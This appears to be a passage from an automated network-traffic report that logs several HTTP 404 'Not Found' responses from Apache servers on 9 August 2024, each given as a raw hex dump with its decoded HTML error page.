Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Fri, 09 Aug 2024 06:41:00 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:49:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:49:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:49:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:49:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:49:11 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:42:49 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:42:52 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:42:54 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 09 Aug 2024 06:42:57 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
